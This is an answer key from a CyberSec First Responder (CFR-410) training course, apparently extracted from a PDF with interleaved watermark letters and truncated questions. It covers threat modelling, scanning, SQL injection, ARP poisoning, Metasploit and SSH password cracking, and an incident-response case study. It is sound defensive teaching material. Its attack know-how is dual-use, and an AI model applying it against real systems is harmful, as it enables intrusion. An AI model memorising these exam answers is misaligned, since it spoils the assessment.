could allow an attacker to carry out this exploit? What mitigation plans, if any, are in place
to address this flaw? How easily and quickly can you patch the flaw, and how will you
deploy it so that all of the app's users are covered?
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 483
e
ut
ACTIVITY 1-4: Integrating Documentation into Risk
ib
Management
tr
5. What are some other acceptable or unacceptable behaviors you can
is
incorporate in a policy like this one?
A: Answers will vary, but you could further assist help desk employees in defending against attacks by
D
forbidding communication using unauthorized channels like private Facebook and Skype accounts. You
can also take a more positive approach by outlining acceptable behavior when it comes to the content
of a help desk request; for example, the information that should be included in an email request so that
it's both useful to the help desk employee and secure at the same time. Likewise, you can encourage or
or
mandate email encryption to provide some measure of authentication and confidentiality in all such
requests.
means that, in the event of newly identified threats or vulnerabilities, you can adjust the document
accordingly. Documents that cannot keep up with ever-shifting organizational risk factors are unhelpful
to their intended audience. Recording a revision history will ensure there is a trail of changes and that
lic
each change is known in the context of when it was made, and that the person(s) who made the
changes are held accountable.
up
1. What attack technique criteria do you envision threat actors are most likely to
use in order to compromise this database?
ot
A: Answers will vary. Depending on the strength of any in-place security controls, an attacker may be
inclined to launch a direct attack on the database. This is more likely to net the attacker access to
N
everything in the database; however, if they are only searching for specific information, they may
choose more indirect means. Because the database is likely to already be hardened against attack,
attackers would probably opt to choose stealthy methods. This would ensure the attack remains
o
undetected before damage is done, and it may help the attacker cover their tracks afterward. However,
attackers interested more in causing damage and denial of service may forgo stealth to maximize their
D
impact.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
484 | CyberSec First Responder® (Exam CFR-410)
e
database to dump its contents. Certain payloads can also be injected into a database to
passively monitor new entries or changes.
ut
3. What do you believe are the most likely intentions an attacker has
when it comes to compromising the customer records database?
ib
A: Answers will vary. Theft is probably the most common intention in this case. An
attacker who is able to steal these records can sell them on the black market or to one of
tr
Develetech's corporate competitors. PII can be very useful to individuals and
organizations looking to gain an advantage over the company or its customers. Similarly,
is
an attacker may be directly spying on Develetech on behalf of one of its competitors to
see where its new products are strongest and gain an edge in the marketplace. More
personal or idealistic intentions, such as revenge and activism, are less likely; however,
D
depending on the company's actions and its relationship with the public, an attacker may
seek to humiliate the company by exposing such a crucial asset to the world.
4.
or
What do you believe are the most likely motives an attacker has for
compromising the customer records database?
A: Answers will vary. Assuming theft is the most likely intent, desire for money is the most
e
likely motive. An attacker can make a great deal of money selling PII. However, there are
many other possible motives: The attacker could have seen all of the recent data
at
breaches in the news and chosen to make a name for themselves by emulating these
breaches; the attacker may destroy the database rather than copy it, demonstrating they
have the power to do so; or the attacker may simply breach the database because they
lic
wanted to see if they could, and not necessarily to exfiltrate any data.
high-profile target. Likewise, there may not be much of a reason why a state-sponsored
hacker would go after an electronics manufacturer. More likely, the threat actor is either
an insider or cybercriminal. For the former, the threat actor already has significant access
ot
to their target, as well as extensive knowledge an external user would not possess. This
gives them a key advantage and can make their theft or destruction of the database much
easier to achieve. A cybercriminal will likely have the requisite skill to break into the
database from the outside, as they have probably made a career out of stealing personal
N
information.
o
D
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 485
6. Based on your previous decisions, how would you describe the profile of the
most likely threat(s) to Develetech's customer records database?
A: Answers will vary depending on the answers to the previous questions, and you may believe that
multiple profiles are necessary. One example is as follows: The threat actor is likely an insider—
someone with knowledge of the database's structure, physical or logical location, and even its
credentials. The insider's motive is most likely a desire for money, as they know this database is very
valuable to identity thieves and corporate competitors. Rather than destroy the database or deny
service to it, the threat's intention is probably to copy the relevant data and exfiltrate it. The insider may
take advantage of the database's poor authentication methods to access it, and may use a code
e
injection exploit to dump the database. The insider is likely somewhat technically proficient if they've
gotten to this point, so they will probably try a stealthy approach and remove any traces that they have
ut
accessed the database.
ib
ACTIVITY 3-1: Analyzing a Threat Model
tr
2. Can you think of any specific attacks that might fall under the general
is
category of web server attacks?
A: Answers will vary, as there can be many potential attacks on a web server. The diagram provided
D
identifies three: Structured Query Language (SQL) injection attacks, cross-site scripting (XSS) attacks,
and file inclusion attacks. Additional attack types include cross-site request forgery (XSRF/CSRF)
attacks, directory traversal, and session hijacking.
4.
more of these subattacks?
or
Can you think of any specific countermeasures that might mitigate one or
e
A: Answers will vary, as there can be many countermeasures to these attacks. The diagram provided
identifies three: using parameterized queries to mitigate SQL injection; limiting or sanitizing user HTML
at
input to mitigate XSS; and creating whitelists and access identifiers to mitigate file inclusion attacks.
lic
various technologies and processes that affect the organization. Attack trees are also a useful
component of a larger threat modeling strategy.
D
A: nmap –sn
A: nmap -sT
D
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
486 | CyberSec First Responder® (Exam CFR-410)
e
12.What are some of the open ports on your server? Are any of them
out of the ordinary?
ut
A: Answers will vary, but you'll see several ports you should expect to be open, like 53
(DNS) and 389 (LDAP). However, an open port like 22 (SSH) may potentially be used as
ib
an attack surface.
tr
ACTIVITY 3-3: Examining Reconnaissance Incidents
is
What were the source and destination IP addresses of this packet?
D
2.
A: Source = 10.39.5.6 and Destination = 10.39.5.2
A: The attacker tried to connect using the Telnet protocol (port 23) but was refused by the
server.
11.What was the attacker trying to discover from your system in this
ot
attack?
A: Which port numbers were open and which were not. In other words, a port scan.
N
A: The attacker could see what services are running on open ports and try to attack those
services.
D
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 487
3. Are the ones in your capture actually an indication of a problem in this case?
A: Not necessarily. Many are time-exceeded errors that are traceroute's way of determining the routers
along the path you specified (in this case, the path to Microsoft's website).
e
A: The easiest way to filter for TCP SYN traffic would be by using tcp.flags.syn==1. You can also
ut
achieve the same result if you use tcp.flags==0x02 || tcp.flags==0x12 as the filter expression.
ib
A: This was part of traceroute. Once it got to a firewall, the remaining echo requests were filtered so
they had no answering packet.
tr
12.What are the strengths of Wireshark as an analysis tool?
is
A: Answers will vary, but may include that it sees every packet the interface sees, it has some advanced
analysis capability, and the filters enable you to break down the capture by almost any metric.
D
13.What are some weaknesses of Wireshark for packet analysis?
A: Answers will vary, but may include that it only sees what the interface it's connected to does (which
or
has limited use in a switched network); the captures can only be automated through the use of third-
party tools; and the program has very little intelligence for detecting suspicious behavior, unlike intrusion
detection systems/intrusion prevention systems (IDSs/IPSs).
e
14.Can Wireshark tell you if certain traffic indicates an attack?
at
A: No—you must be able to analyze the capture and make that determination.
lic
6. What could make this attack more difficult for the attacker?
A: Answers may vary. Encouraging employees to use Google's two-factor authentication would help
mitigate this type of pharming attack. Also, implementing user policies that discourage clicking
D
unsolicited links could also help prevent the attack from succeeding.
A: Answers may vary. An attacker may be able to fool the users more easily if the link itself is
believable, especially if they're spoofing a major website like Google. Likewise, they may choose to
N
spoof a less well-known site to catch the users off guard. This is especially effective if they've convinced
the users they need to enter their credentials for official reasons.
o
8. What is the most significant weak spot that enables attacks like these to
succeed, and what can be done to fix the problem?
D
A: Answers may vary, but almost always, it's the human factor that is the weakest point in social
engineering attacks. Preventing these types of attacks from succeeding requires security awareness
training and fostering a cybersecurity culture within the organization.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
488 | CyberSec First Responder® (Exam CFR-410)
e
7. What other harm could the attacker do with this access?
ut
A: Answers will vary, but the options are almost limitless—they could delete files, install
programs, and download malware for just a few examples.
ib
8. How would you defend against this type of attack?
A: Answers may vary, but the most pressing issue is to enforce a stronger password
tr
policy that rejects such a common and simple password, especially for the administrator.
You can also limit the number of password attempts or disable SSH connections entirely.
is
D
ACTIVITY 4-2: Assessing the Impact of Web-Based
Threats
6.
password fields in the query?
or
How does the form automatically format the user name and
e
A: It adds an opening and closing apostrophe for each field, encasing the field in a string
at
literal.
dump the contents of the members table to see more user login information, and even log
in as specific users.
A: Answers may vary, but one of the most common and useful tactics to deal with SQL
injection is the use of parameterized queries, also known as prepared statements. The
quotation marks in the sign-in injection, for example, would be interpreted literally if the
ot
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 489
e
prominent? What new categories of malware might arise? What new or
ut
changing delivery mechanisms and attack vectors might malware take? What
other predictions about malware did you discover?
ib
A: Answers will vary greatly depending on the time when the class is taught and what web-based
resources you find. Ransomware will likely continue to be prominent well into the future, especially
attacks targeting the healthcare industry. Malware may take advantage of artificial intelligence (AI) to
tr
better avoid detection and cause more harm. Malware targeting edge devices like those used in IoT and
remote work is also likely to grow in prominence.
is
9. What alert level did Windows Security assign the threat? What category of
malware is this file? What does quarantining a file in Windows Security do?
D
A: Windows Security assigned this threat an alert level of Severe. The file is a virus, and Windows
Security automatically placed it in a restricted area where it can't affect the rest of the computer.
11.What or
value does this EICAR test file have in developing and testing anti-
malware systems?
e
A: Answers will vary. Though it is a bit dated, this is one method of ensuring your tool can detect
malware even when it is cloaked (for example, by being inside a ZIP file). You would usually not want to
at
infect your production systems with live malware, so this operates as a substitute.
lic
A: The attacker could use the corrupted ARP caches to set up a man-in-the-middle attack where they
capture traffic between each of the workstations and the router (and maybe alter that traffic, if it is
unencrypted). They could also use this attack to create a DoS condition.
ot
manage technique is to write the ARP tables manually and keep them static. For example, you can add
only workstations that use a particular file server to the table. Subnetting can also reduce the
effectiveness of ARP poisoning, as such an attack won't be routed to different subnets. An IDS can also
o
alert security personnel to suspicious ARP traffic, if configured properly. Port security, DHCP snooping,
and dynamic ARP inspection can work together to effectively identify and block invalid MAC address
D
entries.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
490 | CyberSec First Responder® (Exam CFR-410)
e
3. What port number are the attackers targeting?
ut
A: Port 80 (HTTP), to take down a web server.
ib
6.
A: Answers may vary, but larger Internet companies like Google and Amazon have
massive Internet connection bandwidth and lots of redundancy so they can absorb a
tr
DDoS attack and still stay online. Others either cannot afford to or do not choose to
spend the money to do that.
is
7. How can you defend an organization against DDoS attacks?
D
A: Answers may vary, but it is very difficult without simply buying lots of extra bandwidth
and/or redundant Internet connections. You may be able to consult with your ISP if it
offers some sort of DDoS protection services. You can also attempt to delay, but not fully
or
stop, an attack by incorporating network perimeter defenses like timing out half-open
connections and lowering the thresholds at which to drop certain traffic like ICMP.
Ultimately, it's important to have a plan in place in case you need to escalate your
mitigation efforts to a specialist or other third party.
e
at
A: Answers may vary depending on when you check these reports, but when this course
was written, Android had more than twice as many vulnerabilities as iOS. However, iOS
vulnerabilities were more likely to be in the critical score range (9–10). The weighted
D
average CVSS score for iPhone vulnerabilities was also higher than Android. In past
years, the report showed the opposite of these conclusions, which demonstrates that
mobile vulnerabilities fluctuate over time.
ot
4. Why does the Google Play store have so many security apps?
A: Because it is an open platform, many vendors can sell their apps there. Android's
N
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 491
e
ut
ACTIVITY 4-7: Assessing the Impact of Threats to Cloud
Infrastructures
ib
tr
1. By migrating from on-premises infrastructure to cloud services, what new
security risks or challenges might Develetech be exposed to?
is
A: Examples include: hijacking of the entire cloud account or service (for example, an attacker cracks
the password for the management console); insecure public APIs through which an attacker can gain
D
access to the company's private resources; a malicious insider at the cloud services firm looking to
harm the company or the cloud services firm; as well as the general risks associated with moving to any
web-based service (DoS, password cracking, man-in-the-middle, etc.). One of the fundamental
principles of most cloud services is leveraging economies of scale by sharing a huge pool of storage
or
and computing resources among many customers. Although there are many benefits to this approach, it
also brings a potential weakness. Any vulnerability in the cloud service that enables a malicious
customer of the cloud service to escape their own sandbox may enable them to access information
resources that belong to other companies. While the likelihood of this risk might be low, its impact can
e
be quite high, including the loss of valuable or sensitive data, service interruption for clients and the
cloud provider, possible loss of reputation, legal and civil penalties, and compliance violations.
at
forensics?
A: With local infrastructure, forensic investigations can often be accomplished at the physical level with
an analysis of content in specific storage media. With the cloud, forensics becomes much more complex
up
due to the virtual nature of storage and computing resources. For example, some cloud vendors may
distribute a single user's storage across multiple drives, multiple data centers, or even multiple
geographic regions. Establishing a chain of custody becomes difficult or impossible. As it considers
each cloud service it might adopt, Develetech should model various forensic scenarios to determine if it
D
will be possible to obtain evidence it needs when it needs it. In some cases, it may be necessary to
build forensic capabilities into the design when customizing cloud services or integrating them into your
own infrastructure.
ot
can use the big data and scalable computing tools provided by cloud services to perform resource-
intensive operations such as password cracking or DDoS attacks. Hosting services can be used as
collection points for data collected by attackers or as distribution points for malware.
o
D
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
492 | CyberSec First Responder® (Exam CFR-410)
e
communication may successfully bypass such controls.
ut
6. How might you stop this type of communication?
A: Answers will vary. Blocking outbound ICMP traffic is an option, but it limits your ability
ib
to diagnose network problems through ping and traceroute. Stateful filtering of this
traffic will not be useful, as there is no state to filter. Application-layer firewalls also tend to
ignore ICMP. However, packet inspectors may be able to review ICMP traffic for unusual
tr
behavior, such as the messages' length or contents. The fact that Windows Security
identified the bot executable as malicious is promising, but it won't necessarily detect
every possible payload.
is
7. What other methods of command and control could an attacker use
D
to evade your security?
A: Answers may vary, but should at least include mention of HTTP/S and DNS. These are
or
very difficult to detect and stop because they blend into normal traffic.
A: Answers may vary, but rootkits infect a device at its lowest levels, including being able
to alter the fundamental behavior of the operating system itself. Therefore you cannot
always trust an anti-malware scan that's running on the operating system to accurately
detect a rootkit.
up
A: Answers may vary, but rogue accounts, unlike backdoors, do not require malicious
software to be installed on the target device. There just needs to be an account
configured on the device that has the desired level of access. This helps the attacker
ot
3. What does the threat profile of a successful APT usually look like?
N
A: Answers may vary, but APTs are usually launched by multiple experienced
cybercriminals, state-sponsored hackers, or other skilled attackers because of the
o
difficulty in remaining stealthy for long periods of time. There are many potential motives
behind APTs, including a desire for money and association with a larger group. Likewise,
D
the intent of an APT can vary, though it often centers on theft, espionage, or denial of
service.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 493
e
A: Answers may vary, but they could disable SSH access on the server, block remote access ports on
the firewall, or implement an IDS/IPS or data loss prevention (DLP) software to monitor sensitive file
ut
movement.
7. What other methods could an attacker use to remove data from the
ib
organization?
A: Answers may vary, but could include: physically connecting removable media to the server;
tr
exfiltrating over FTP/S; exfiltrating over HTTP/S, using Netcat as a backdoor to read and write files over
the network; and more.
is
D
ACTIVITY 5-5: Assessing Anti-Forensics Techniques
decision maker?
A: Answers may vary, but you can tell your audience the server is failing to meet the password
requirements set out by company policy, and that these issues should be corrected in the domain policy
N
and then pushed out across the domain. You can also suggest that Microsoft accounts be explicitly
prevented from logging on to the server to correct the one local security policy failure. From a physical
security standpoint, although being able to move the server around is more convenient, the
o
administrators should securely fasten the server to the shelf or some other surface to prevent it from
being carried out. If they need to make room for new equipment, they should better plan where to place
D
existing equipment and the new equipment. Lastly, you should suggest that the company install
automatic lights so the lights turn on when administrators enter the room and turn off when they exit.
That way, passersby can't see into the room when no one's around.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
494 | CyberSec First Responder® (Exam CFR-410)
e
A: Answers may vary, as there are several requirements that PCI DSS outlines for the
organization. Some examples include: the organization must scan for all wireless access
ut
points (WAPs) in its environments at least once every three months; the organization
must run a vulnerability scan after a significant change to its network (e.g., its topology
changes); the organization must allow an external vulnerability assessment agency
ib
validated by PCI DSS to scan environments every three months; the organization must
have a monitoring process in place for detecting changes to critical files; and more.
tr
4. How could the nature of this cloud platform business inhibit
Develetech from remediating this problem?
is
A: Answers may vary, but Develetech needs to consider the impact of putting the security
patch in place. If the company simply propagates the fix to all production environments at
D
once, there will likely be processing and networking bottlenecks that cause delays or may
even lead to a disruption of service. If this is in direct violation of the SLA, Develetech
may be subject to legal action. The vulnerability management plan needs to account for
5.
or
the impacts of remediation with regard to the company's various business arrangements.
take several hours, or even days, while the port scan may take just a few minutes.
Another factor to consider is employee workflow. Starting the comprehensive scan in the
middle of a weekday is not the best choice, as the chance of interrupting business is at its
up
highest. Performing either scan after business hours or on the weekend is usually the
best approach.
D
6. When you fix the major vulnerabilities in a system, how can you
ensure they are repaired?
N
A: You can rerun the GSA scan and see if the vulnerabilities persist.
o
7. Why would you not always be able to fix a vulnerability that GSA
marks as critical?
D
A: Answers may vary, but some vulnerabilities require software patching to fix them, and
the organization may not be able to update certain software. Some services may also be
marked as critical vulnerabilities by GSA, but must be enabled on the host for a variety of
reasons.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 495
e
ut
ACTIVITY 6-4: Conducting Penetration Testing on Network
Assets
ib
tr
7. How would you defend against this attack?
A: Answers will vary, but might include: use an intrusion detection system (IDS)/intrusion prevention
is
system (IPS), use two-factor authentication for administrator accounts, limit the number of administrator
accounts, and ensure strong passwords.
D
8. What other tools would work well with the Metasploit Framework in a
penetration testing environment?
or
A: Answers might include vulnerability scanners such as Nessus, Rapid7, and so on; password crackers
like John the Ripper, Cain & Abel, Ncrack, and L0phtCrack; and Nmap and other port scanners.
e
ACTIVITY 7-1: Deploying a Security Intelligence Collection and
at
Analysis Platform
lic
1. What are the advantages of CSM that could convince management to offer
their financial backing?
up
A: Answers may vary, but with CSM, the organization is able to constantly survey all of its assets for any
behavior that induces risk. Data collected on this behavior is both up to date and actionable; problems
are detected immediately, and can likewise be contained as quickly as possible to minimize damage.
D
These CSM systems can also be configured and customized to suit the organization's needs, even as
business operations or the threat landscape change. Ultimately, a CSM can drastically reduce the risk
of an attack going unidentified for a long period of time due to stagnant collection processes.
ot
2. What steps would you take to determine which sources to choose for data
collection?
N
A: Answers may vary, but the organization should first identify the major risks it faces. The risk
assessment team then needs to prioritize those risks by measuring the most likely risks against the risks
that will cause the most damage. This will enable the intelligence collection team to focus on data that is
o
most relevant to mitigating those risks. The collection team will review these relevant data sources for
components like alerts, logs, captures, etc., that can provide insight into the risk. Lastly, the collection
D
team will narrow their focus to the most actionable data, and attempt to eliminate redundant data or
data that does not provide optimal value.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
496 | CyberSec First Responder® (Exam CFR-410)
e
ut
ACTIVITY 7-2: Collecting Network-Based Security
Intelligence
ib
tr
3. How many TCP packets did Snort examine?
A: Answers will vary, but the number will be large, typically in the thousands.
is
4. Why do you think there were only five instances of each alert in the
D
traffic?
A: The limits placed in the rules file show only the first five instances of each alert within a
5.
30-minute period.
8. Were all of the XMAS scans identical? If not, how were they
up
different?
A: No, some have just FIN, PSH, and URG, while the others include the SYN flag. Three
of them are marked by Wireshark as retransmissions.
D
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 497
4. Looking at the remote logon event list, can you tell what caused these
events?
A: Several of these remote logon events were created when you remotely accessed the server using
the Metasploit PsExec exploit during the penetration test activity.
e
5. What is the value of this tool beyond using Event Viewer alone?
ut
A: Answers will vary. Log Parser can combine multiple logs, even from different devices. It also
automates many of the queries you would otherwise have to do by hand.
ib
ACTIVITY 8-1: Analyzing Linux Logs for Security Intelligence
tr
is
3. How would you use grep to look for a negative match for a pattern rather than
a positive match?
D
A: The -v flag does a negative match.
7.
or
A: Answers will vary, but major delimiters include space, tab, period, and comma.
4. Is there any evidence of the SSH password attack you ran in the "Analyzing
D
5. Despite the fact that you covered your tracks in the "Analyzing Post-Attack
N
the "Analyzing Attacks on Computing and Network Environments" lesson, as mentioned in the previous
question. This is because some SSH activity is also sent to the Security log, which you likely didn't
D
clear. Remember, you performed online dictionary cracking using Ncrack; it tried and failed to connect
using many different passwords before it successfully connected with the correct password.
6. How would you look specifically for SSH password failures for the
Administrator account that came from Kali Linux?
A: Answers may vary, but using the search query sshd pass* fail* admin* 10.39.5.# where # is the last
octet of your Kali Linux IP address will work.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
498 | CyberSec First Responder® (Exam CFR-410)
8. What other sources of data would you load into Splunk in the
Develetech network?
A: Answers will vary, but should include firewall logs, intrusion detection system (IDS)
logs, web server logs, and logs from other critical systems.
e
ut
ACTIVITY 9-1: Analyzing Incidents with Windows-
Based Tools
ib
tr
2. How would you renew a Dynamic Host Configuration Protocol
(DHCP) lease on your Ethernet adapter?
is
A: ipconfig /renew Ethernet
D
4. What is the default gateway for your Ethernet adapter?
A: 10.39.5.1
5.
or
What is the DNS address for your Ethernet adapter?
A: 10.39.5.#, where # is the student's Windows Server IP address.
e
8. What do the -a and -b flags do in netstat?
at
A: The -a flag shows all connections and listening ports, and the -b flag shows the
executables associated with each connection.
lic
16.How could these tools help you discover and deal with malware?
A: Answers will vary. The netstat command can enable you to find any open or recently
closed network connections that are either malicious or being used in an insecure way.
D
Process Explorer enables you to find suspicious processes and see how they interface
with system DLLs and the Windows Registry. Registry Editor enables you to further
identify a suspicious program's configuration details, including any changes to the less
ot
visible components of the operating system. With any tool, you need a good working
knowledge of Windows' normal operation to make educated decisions about what is and
is not malware.
N
o
2. How would you change the maximum transmission unit (MTU) for
the eth0 interface to 512?
A: sudo ip link set eth0 mtu 512
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 499
6. How might you use the top command to detect malicious activity?
A: Answers may vary, but one of the most common ways to detect malicious activity is by watching the
e
memory and CPU usage of processes running on the system. You may be able to spot suspicious
processes that are taking up too many resources.
ut
10.What other Linux tools and commands could you use to search the capture if
ib
you didn't have access to Wireshark?
A: Answers may vary, but using grep to search the capture for specific addresses, protocols, or other
tr
details, and cut to trim the output, would be useful.
is
ACTIVITY 9-3: Analyzing Indicators of Compromise
D
2. What can you conclude about the account listed in the results?
or
A: It hasn't been used yet, and appears to have been created as a backup or backdoor method for
access to the domain. The DC administrators may be helpful in verifying this account's purpose.
Assuming this account was created or used by an attacker, what could the
e
3.
attacker have done to make it harder to spot as malicious?
at
A: The attacker could have given it a name more relevant to the company, especially if the company
has specific account naming conventions. Limiting the account's privileges may also make it less likely
lic
to be monitored or audited.
A: Windows logged everything associated with accessing the directory, even the directory listing
commands.
A: Answers may vary, but the volume of logs would be incredibly difficult, if not impossible, to manage.
ot
A: Answers may vary, but a host-based intrusion detection system/host-based intrusion prevention
system (HIDS/HIPS) or file integrity monitors (FIMs) are suited to this kind of security control.
A: Answers will vary, but could include: excessive login failures, unexplainable gaps in logs, unusual
D
levels of ICMP traffic or other networking protocols, unusually high access rates to the Administrator
account, and so on.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
500 | CyberSec First Responder® (Exam CFR-410)
2. What members of the organization will help you deal with the
current incident? Which others would you routinely include in the
CSIRT?
e
A: Answers will vary, but management, IT, human resources, and physical security might
routinely be included here.
ut
4. Which of these questions can you answer now?
ib
A: Answers will vary, but might include basics of the event, timestamps, some locations
(internal at least), and the fact the incident is unsolved.
tr
5. What additional questions would you ask about the incident based
on what you know so far?
is
A: Answers will vary, but they might include: Who is in the office today? What files were
taken? Is there any evidence of proprietary information being posted publicly?
D
1.
or
ACTIVITY 10-2: Identifying and Analyzing an Incident
What else should you and your team collect that will help you
e
understand what happened?
at
A: Answers will vary. The team will need to collect any network logs that list remote
access events. The team discovered the remote IP address (67.240.182.117), but any
additional information, like the number of connection attempts, or any past activity by this
lic
IP address, will be valuable. On a network level, the team should also identify any
intrusion detection/prevention activity that generates alerts. If the affected server has any
anti-malware or HIDS/HIPS running, the team should also consider any alerts from these
up
as incident-related data. The team can also consult its SIEM solution to see if any
anomalous activity was detected in its log analysis duties. At this point, the team doesn't
know what, if anything, was done to the server or network. All of these tool-assisted
records can help them piece together the extent of the damage. Beyond technical
D
sources of data, others in the team should also start interviewing all relevant employees.
Charles needs to describe every step that he took when he tried signing in to his account,
as well as who he contacted to get that resolved, and when. The help desk employee
ot
needs to corroborate this information. Likewise, you should confiscate Pat's workstation.
It may be helpful to try contacting Pat as well and explaining the situation. Any
surveillance camera footage around the time of Pat's computer accessing the server
should also be gathered. What's more, you should determine if anyone else was in the
N
building before 8:00 a.m. and witnessed any unusual behavior, especially around Pat's
desk.
o
A: Unfortunately, not much. A fact of incident analysis is that not every indicator or source
of information will be relevant or even accurate. This could indicate that someone
specifically used this IP address because they knew it had no history that could be traced
back to them; or, it might simply mean that it was the user's first time ever accessing a
remote computer in the domain from that IP address.
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 501
4. What does this suggest about the role of Pat's account and workstation in the
incident?
e
A: It suggests the attacker merely found the password Pat wrote down and put in the drawer, and then
ut
used that to log in to the account at Pat's workstation.
5. What practices should the team put in place for this important phase of the
ib
response?
A: Answers will vary. The team should have a baseline already in place for normal behavior on both a
tr
network level and on the affected host. This will make detecting a deviation from the norm much easier.
The team has already done some log correlations, but it also needs to go further and make sure that it
is
knows exactly what happened on the network and the host at specific times. A SIEM solution can assist
the team in doing this, if available. The team can also make their jobs easier by filtering out irrelevant
data they've collected, which often becomes apparent during the analysis phase. Any alerts generated
D
by IDSs at key times may also confirm the nature of a possible attack, especially if any reconnaissance
was done prior to the incident.
A: It suggests that a sensitive document was quickly exfiltrated from the research and development
server and moved to a different host—most likely Pat's workstation—as it was the only account signed
in at the time. The document was then deleted from Pat's workstation.
lic
to use Charles' account to connect remotely to the internal research and development server. The
attacker failed. Later, in the early morning before most people made it in to the office, the attacker
physically went to Pat's desk, discovered the password written down in a drawer, and used it to log in to
the workstation and the remote server. While in the remote server, the attacker transferred sensitive
D
product files to Pat's workstation, where the attacker then copied the file to a removable drive. The
attacker deleted the file from Pat's workstation, ejected the removable drive, and left. The organization's
data has been breached.
ot
N
o
D
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
502 | CyberSec First Responder® (Exam CFR-410)
e
A: Answers will vary. Some devices, like Pat's workstation and the research and
development server, have been collected for analysis. They should stay disconnected
ut
and isolated from the wider network in case the attacker has a backdoor communication
channel into these devices. When the CSIRT is ready, they should also perform malware
scans on the isolated systems to determine if any filtering needs to be applied to the
ib
wider network. If the attack was assisted by malware, the team needs to block the source
of that malware using whatever method they deem to be appropriate. Both Charles and
Pat should have their domain accounts disabled for now, so the attacker cannot continue
tr
to use them as vectors. Network access to other servers that hold sensitive information
should also be actively monitored or completely denied, depending on how significantly
is
this will impact business needs.
D
this breach?
A: If the attacker was able to exfiltrate data onto a USB drive and leave the building with
or
it, they could have distributed it in any number of ways. If the design document falls into
the hands of a competitor or is uploaded to the public Internet, it will be very difficult, if not
impossible, to fully contain the breach.
e
3. How would you recover the functionality that the research and
development server provided, such as serving documents about
at
A: Answers will vary. Some may argue that, because the systems are both clean of
malware, and the only point of compromise at the moment is user accounts that have
been disabled, it is safe to push both computers back into production. However, without
up
the full picture of the incident, it would be premature to say there couldn't be other points
of compromise that the team doesn't yet know about. Likewise, both devices may need to
be treated as evidence in an upcoming investigation, so pushing them back out rather
than keeping them quarantined would hurt that investigation. Instead, it would be best to
D
recover the latest backup copy of the research and development server, put that backup
image on a different machine, and use that as the live production environment for now.
The IT department can provision a temporary workstation for Pat while the normal one is
ot
quarantined.
N
o
D
Solutions
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
CyberSec First Responder® (Exam CFR-410) | 503
4. When it comes to Charles' and Pat's disabled user accounts, how will you
approach recovery?
A: Answers will vary. The team may decide to restore Charles' account immediately, as it appears the
attacker only knew his user name, and not his password. His user name is likely common knowledge in
the company or easily guessable anyway. Therefore, anyone with access to the research and
development server could have been a target without having done anything necessarily wrong. On the
other hand, Pat's account is compromised and it needs a password change before it can be re-enabled.
However, even before that, it would be a good idea to ensure that Pat is trained on proper end-user
security practices, and should be reacquainted with the company-specific policy regarding passwords
e
and password storage. The human factor is one of the weakest points in the security of any
organization, and writing passwords down and putting them in an unlocked drawer is certainly not an
ut
acceptable practice. Until Pat has demonstrated a willingness to comply with security policies and
guidelines, the account should stay disabled.
ib
5. What lessons have you learned from this incident, what suggestions do you
have so that an incident like this is prevented in the future, and what other
tr
content should be in the report?
A: Answers will vary. The AAR should clearly outline what actions the CSIRT took in its incident
is
handling procedures. This includes every step, from identification and analysis, to containment and
eradication, and then to recovery. The report should justify the actions the team took, and, if applicable,
should admit if there were more efficient and accurate ways of handling the incident. Finally, the team
D
needs to ask itself what should change as a result of this incident. The suggestions they put forth can
be: encrypt the research and development server and every other server that holds sensitive data;
disable USB ports on certain at-risk hosts; mandate company-wide training for end users on best
or
security practices; draft policies that mirror this training, especially concerning best usage of passwords
and the storage of those passwords; and, if feasible, implement a DLP solution on the research and
development server so that any attempted exfiltration of data will be denied.
e
at
responder?
A: Answers may vary, but the most clear difference is that a first responder is concerned with detecting
an incident and stopping it, thus returning operations to normal; whereas a forensic investigator is
D
focused on evidence, as well as understanding the nature of an incident to pursue punitive actions or
determine that no such action should be taken.
2.
A: Answers may vary, but both an incident responder and a forensic investigator will need to be involved
in securing and isolating assets, sharing information about the possible source and vector of an attack,
N
3. What are some of the best practices that you can employ when
o
A: Answers will vary. First, the CSIRT will want to designate a liaison. Although both teams can meet as
a whole, this liaison will be an ongoing point of contact for the forensic team to consult with. This point of
contact should be the authoritative voice of the team, able to bridge both the needs of the CSIRT and
those of the forensic team. The CSIRT should also communicate the scope of the incident: every asset
